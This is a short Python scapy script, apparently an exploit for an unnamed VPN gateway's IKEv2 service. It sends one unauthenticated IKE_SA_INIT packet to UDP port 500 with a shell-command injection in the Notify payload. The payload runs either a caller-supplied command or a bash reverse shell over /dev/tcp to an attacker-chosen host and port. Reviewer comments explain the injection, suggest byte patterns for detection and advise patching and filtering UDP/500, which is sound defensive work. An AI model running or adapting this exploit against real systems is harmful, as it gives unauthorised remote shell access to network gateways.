#!/usr/bin/python3
import sys
from scapy.all import *
import argparse
# Command-line interface: a required target address (rhost) plus either
# --cmd or the --lhost/--lport pair. Every value is used verbatim as a
# string; nothing below validates or escapes it.
parser = argparse.ArgumentParser()
parser.add_argument("rhost")
parser.add_argument("--cmd")
parser.add_argument("--lhost")
parser.add_argument("--lport")
args = parser.parse_args()
# Register scapy's IKEv2 contrib layers (IKEv2, IKEv2_payload_Notify,
# IKEv2_payload_Nonce) that the packet below is built from.
load_contrib('ikev2')
# Both branches wrap the command in the same envelope: a leading `";` and a
# trailing `;echo -n "`.
# NOTE(review): that shape closes and re-opens a double-quoted string, so the
# receiving IKE service presumably interpolates the Notify data into a shell
# command line without escaping it. Confirm against the vendor advisory for
# the affected product; the page does not name it.
if args.cmd is not None:
    # Caller-supplied command, concatenated as-is.
    cmd = "\";bash -c \"" + args.cmd + "\";echo -n \""
elif args.lhost and args.lport:
    # Fixed command that attaches an interactive bash to a TCP connection
    # towards lhost:lport. On the defended side this shows up as an outbound
    # TCP session originating from the gateway itself shortly after the
    # inbound UDP/500 datagram.
    cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + args.lhost + "/" + args.lport + " <&1;\";echo -n \""
else:
    print("Check your syntax, and try again")
    # NOTE(review): sys.exit() with no argument exits with status 0 even
    # though this is the usage-error path.
    sys.exit()
# A single unauthenticated IKE_SA_INIT datagram to UDP/500: Initiator flag
# set, random 8-byte initiator SPI, a Notify payload of type 14
# (NO_PROPOSAL_CHOSEN in RFC 7296) and a Nonce payload of 68 random bytes.
# The Notify data is a repeated "HAXB" filler followed by the shell fragment
# built above.
# Detection: notification data in an IKE_SA_INIT is not expected to carry
# double quotes, semicolons or `bash -c`; match on those bytes in the Notify
# payload rather than on the filler string.
# Mitigation: apply the vendor fix and limit UDP/500 on the WAN side to known
# VPN peers.
packet = IP(dst = args.rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68))
# Fire-and-forget: send() transmits at layer 3 and the script never reads a
# reply, so it gives no indication of whether the target processed the packet.
send(packet)